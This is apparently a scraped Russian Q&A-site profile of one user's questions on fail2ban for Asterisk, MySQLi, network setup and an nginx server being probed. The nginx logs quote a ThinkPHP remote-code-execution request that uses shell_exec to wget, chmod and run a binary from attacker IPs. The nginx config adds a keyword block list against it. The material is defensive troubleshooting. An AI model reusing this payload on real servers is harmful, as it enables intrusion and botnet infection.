Как правильно установить fail2ban на Ubuntu 16.04?

wiki.friendlyarm.com/wiki/index.php/ZeroPi

[Jun 14 18:32:49] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:3801@95.153.108.70>' failed for '47.116.2.134:55228' - Wrong password
[Jun 14 18:32:50] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 448489382-1057232789-495721129 on non-critical invite transaction.
[Jun 14 18:32:52] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:267@95.153.108.70>' failed for '47.104.199.253:54371' - Wrong password
[Jun 14 18:32:54] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:1010@95.153.108.70>' failed for '47.116.2.134:64367' - Wrong password
[Jun 14 18:32:57] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:268@95.153.108.70>' failed for '47.104.199.253:55770' - Wrong password
[Jun 14 18:33:00] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:9989@95.153.108.70>' failed for '47.116.2.134:54584' - Wrong password
[Jun 14 18:33:03] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:269@95.153.108.70>' failed for '47.104.199.253:57160' - Wrong password
[Jun 14 18:33:04] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 900928925-995863455-1270982707 on non-critical invite transaction.
[Jun 14 18:33:05] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:103@95.153.108.70>' failed for '47.116.2.134:61801' - Wrong password
[Jun 14 18:33:08] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:270@95.153.108.70>' failed for '47.104.199.253:60349' - Wrong password
[Jun 14 18:33:11] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:403@95.153.108.70>' failed for '47.116.2.134:56160' - Wrong password
[Jun 14 18:33:14] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:271@95.153.108.70>' failed for '47.104.199.253:61743' - Wrong password
[Jun 14 18:33:19] WARNING[1292]: chan_sip.c:4140 retrans_pkt: Retransmission timeout reached on transmission 865724920-345173970-1732455504 for seqno 2 (Critical Response) -- See https://wiki.asterisk.org/wiki/display/AST/SIP+Retransmissions
Packet timed out after 32001ms with no response
[Jun 14 18:33:19] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 1221310584-971346634-449513973 on non-critical invite transaction.
[Jun 14 18:33:20] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:272@95.153.108.70>' failed for '47.104.199.253:63115' - Wrong password
[Jun 14 18:33:22] NOTICE[1292][C-00000014]: chan_sip.c:19635 send_check_user_failure_response: Failed to authenticate device <sip:444@95.153.108.70>;tag=330089800 for INVITE, code = -1
[Jun 14 18:33:22] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:3049@95.153.108.70>' failed for '47.116.2.134:50208' - Wrong password
[Jun 14 18:33:26] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:273@95.153.108.70>' failed for '47.104.199.253:64659' - Wrong password
[Jun 14 18:33:28] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:26@95.153.108.70>' failed for '47.116.2.134:63194' - Wrong password
[Jun 14 18:33:32] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:274@95.153.108.70>' failed for '47.104.199.253:49844' - Wrong password
[Jun 14 18:33:33] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 1841869371-1500174654-1005709748 on non-critical invite transaction.
[Jun 14 18:33:34] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:20@95.153.108.70>' failed for '47.116.2.134:59170' - Wrong password
[Jun 14 18:33:38] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:275@95.153.108.70>' failed for '47.104.199.253:51234' - Wrong password
[Jun 14 18:33:39] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:301@95.153.108.70>' failed for '47.116.2.134:56838' - Wrong password
[Jun 14 18:33:43] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:276@95.153.108.70>' failed for '47.104.199.253:52610' - Wrong password
[Jun 14 18:33:45] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:811@95.153.108.70>' failed for '47.116.2.134:52152' - Wrong password
[Jun 14 18:33:46] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 33687658-753371463-615339028 on non-critical invite transaction.
[Jun 14 18:33:49] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:277@95.153.108.70>' failed for '47.104.199.253:54026' - Wrong password
[Jun 14 18:33:51] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:601@95.153.108.70>' failed for '47.116.2.134:53819' - Wrong password
[Jun 14 18:33:54] WARNING[1292]: chan_sip.c:4140 retrans_pkt: Retransmission timeout reached on transmission 228731125-517513660-1663896340 for seqno 2 (Critical Response) -- See https://wiki.asterisk.org/wiki/display/AST/SIP+Retransmissions
Packet timed out after 32000ms with no response
[Jun 14 18:33:55] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:278@95.153.108.70>' failed for '47.104.199.253:55435' - Wrong password
[Jun 14 18:33:56] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:4022@95.153.108.70>' failed for '47.116.2.134:64058' - Wrong password
[Jun 14 18:33:58] NOTICE[1292][C-00000018]: chan_sip.c:19635 send_check_user_failure_response: Failed to authenticate device <sip:444@95.153.108.70>;tag=1719053430 for INVITE, code = -1
[Jun 14 18:34:00] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 185565220-155413723-1804673829 on non-critical invite transaction.
[Jun 14 18:34:00] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:279@95.153.108.70>' failed for '47.104.199.253:56845' - Wrong password
[Jun 14 18:34:02] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:4060@95.153.108.70>' failed for '47.116.2.134:57746' - Wrong password
[Jun 14 18:34:06] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:280@95.153.108.70>' failed for '47.104.199.253:58262' - Wrong password
[Jun 14 18:34:07] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:2125@95.153.108.70>' failed for '47.116.2.134:53909' - Wrong password
[Jun 14 18:34:12] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:281@95.153.108.70>' failed for '47.104.199.253:59665' - Wrong password
[Jun 14 18:34:13] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:1004@95.153.108.70>' failed for '47.116.2.134:64286' - Wrong password
[Jun 14 18:34:13] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 745289027-1526549781-2117819593 on non-critical invite transaction.
[Jun 14 18:34:17] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:282@95.153.108.70>' failed for '47.104.199.253:61065' - Wrong password
[Jun 14 18:34:18] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:290@95.153.108.70>' failed for '47.116.2.134:54640' - Wrong password
[Jun 14 18:34:23] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:283@95.153.108.70>' failed for '47.104.199.253:62471' - Wrong password
[Jun 14 18:34:24] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:102@95.153.108.70>' failed for '47.116.2.134:51909' - Wrong password
[Jun 14 18:34:27] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 625644818-1078643364-1471235237 on non-critical invite transaction.
[Jun 14 18:34:29] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:284@95.153.108.70>' failed for '47.104.199.253:63856' - Wrong password
[Jun 14 18:34:29] NOTICE

Почему у меня не работает конфиг?

root@ZeroPi-Asterisk:~# fail2ban-client status asterisk
Status for the jail: asterisk
|- Filter
|  |- Currently failed: 0
|  |- Total failed:     0
|  `- Journal matches:
`- Actions
   |- Currently banned: 0
   |- Total banned:     0
   `- Banned IP list:
root@ZeroPi-Asterisk:~#

Конфиг работает, проверял в [asterisk] добавлял [asterisk1] что бы проверить fail2ban-client status asterisk1 и он работал, вернул обратно, в основном конфиге смотрел [asterisk] и там нету enable, ну и я название менял - а fail2ban не работает

root@ZeroPi-Asterisk:~# cat /etc/fail2ban/jail.d/asterisk.conf
[asterisk]
enabled = true
filter = asterisk
action = iptables-allports[name=ASTERISK, protocol=all]
logpath = /var/log/asterisk/messages
maxretry = 2
findtime = 86400
bantime = 604800
root@ZeroPi-Asterisk:~#

Что убивает SSD?

Запущен TeamSpeak сервер на SSD 2 как и NGINX, PHP и логги там же

MySQLi в PHP почему массив в массиве?

я запутался потому что не мог разобраться почему я получал только 1 значение из таблицы, потом нашёл mysqli_fetch_all и тут запутался.
В общем, шаблон для всех запросов есть? или так делать неправильно?

MySQLi в PHP почему массив в массиве?

array(3) {
  [0]=>
  array(1) {
    [0]=>
    string(12) "172.30.255.1"
  }
  [1]=>
  array(1) {
    [0]=>
    string(12) "172.30.255.2"
  }
  [2]=>
  array(1) {
    [0]=>
    string(12) "172.30.255.3"
  }
}

Почему я получаю локальный адрес n.n.n.n.in-addr.arpa через DNS?

почему происходит PTR запросы?

Как или где настроить IP интерфейса?

Sanes, почему я вроде деактивировал IPv6 а всё равно получаю его?

Как или где настроить IP интерфейса?

Sanes, не могу разобраться - я могу настроить сначала статику и динамику на одном интерфейсе? или через /etc/network/interfaces?

Как или где настроить IP интерфейса?

cat /etc/network/interfaces
auto lo
iface lo inet loopback

Как или где настроить IP интерфейса?

Sanes, Ubuntu 16.04.7 LTS 4.14.111

# uname -a
Linux ZeroPi-theProsto 4.14.111 #1 SMP Thu Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l GNU/Linux

Как или где настроить IP интерфейса?

стоковая система стоит, смотрю инструкцию: https://wiki.friendlyarm.com/wiki/index.php/Use_Ne...

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight,

2021/01/13 11:44:27 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:44:27 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 accept: 5.89.124.222:48290 fd:9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer add: 9: 60000:4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 1
2021/01/13 11:44:27 [debug] 589#589: *13 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:44:27 [debug] 589#589: *13 post event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 delete posted event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 http wait request handler
2021/01/13 11:44:27 [debug] 589#589: *13 malloc: 0059A928:1024
2021/01/13 11:44:27 [debug] 589#589: *13 posix_memalign: 0059AD30:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 recv: fd:9 0 of 1024
2021/01/13 11:44:27 [info] 589#589: *13 client closed connection while waiting for request, client: 5.89.124.222, server: 0.0.0.0:80
2021/01/13 11:44:27 [debug] 589#589: *13 close http connection: 9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer del: 9: 4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 0
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059A928
2021/01/13 11:44:27 [debug] 589#589: *13 free: 00584A50, unused: 8
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059AD30, unused: 232
2021/01/13 11:56:00 [debug] 589#589: post event 005BF860
2021/01/13 11:56:00 [debug] 589#589: delete posted event 005BF860
2021/01/13 11:56:00 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:56:00 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 accept: 86.34.111.230:33013 fd:9
2021/01/13 11:56:00 [debug] 589#589: *14 event timer add: 9: 60000:4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 1
2021/01/13 11:56:00 [debug] 589#589: *14 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:56:00 [debug] 589#589: *14 post event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 delete posted event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 http wait request handler
2021/01/13 11:56:00 [debug] 589#589: *14 malloc: 0059A928:1024
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0059AD30:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 recv: fd:9 320 of 1024
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 0
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0058AD60:4096 @16
2021/01/13 11:56:00 [debug] 589#589: *14 http process request line
2021/01/13 11:56:00 [debug] 589#589: *14 http request line: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http uri: "/index.php"
2021/01/13 11:56:00 [debug] 589#589: *14 http args: "s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http exten: "php"
2021/01/13 11:56:00 [debug] 589#589: *14 http process request header line
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Connection: keep-alive"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept-Encoding: gzip, deflate"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept: /"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "User-Agent: Uirusu/2.0"
2021/01/13 11:56:00 [debug] 589#589: *14 http header done
2021/01/13 11:56:00 [info] 589#589: *14 client sent HTTP/1.1 request without "Host" header while reading client request headers, client: 86.34.111.230, server: vitko-core.ru, request: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http finalize request: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" a:1, c:1
2021/01/13 11:56:00 [debug] 589#589: *14 event timer del: 9: 4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 http special response: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http set discard body
2021/01/13 11:56:00 [debug] 589#589: *14 xslt filter header
2021/01/13 11:56:00 [debug] 589#589: *14 HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 13 Jan 2021 09:56:00 GMT
Content-Type: text/html
Content-Length: 182
Connection: close

Что тут не так? просто смотрю этот лог и пытаюсь понять как это всё работает. Ошибка 400 от nginx это хорошо для него или нет?

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight, ошибка 400 - пытался на уровне nginx фильтровать, работает только если я делаю запрос из своего железа

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight, он один раз сработал http://vitko-core.ru/dev/log/. Вчера проверял через curl вроде всё работало, очистил лог - смотрю уже сейчас уже нет

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight, в index.php подключаю этот файл

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight,

root@ZeroPi-WWW:/tmp# cat /etc/nginx/sites-enabled/vitko-core.ru
# http://vitko-core.ru

server {
    listen 80 default_server;

    root /var/www/vitko-core.ru;

    index index.php index.html index.htm;

    server_name vitko-core.ru www.vitko-core.ru;

    #if ($request_uri ~* "call_user_func_array|shell_exec|wget") { return 444;break;}

        location / {
                if ($query_string ~ "call_user_func_array" ) {
                        return 403;
                }

                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                if ( $args ~* "call_user_func_array|shell_exec|wget" ) {
                        return 444;
                }
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        }
}

смотрю лог:

{"status": "400","ip": "189.111.65.123","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://88.218.16.198/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "Uirusu/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T23:08:40+02:00"}

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight, извини, я чайник)) умные слова я не сразу понимаю

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

xmoonlight, типо в index.php сделать проверку? кажись понял идею

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

Regex-фильтр всех входных пользовательских данных

в каком режиме это? на стороне nginx? если можно ткните куда смотреть :)

Nginx 1.10 эксплойт php через аргументы GET, как пофиксить?

Lynn «Кофеман»,

Почему php $_SERVER['REMOTE_ADDR'] возвращает СЕРЫЙ IP адрес провайдера?

http://vitko-core.ru:80/ серый домен тогда получается? Первую часть сообщения не понял как и вторую часть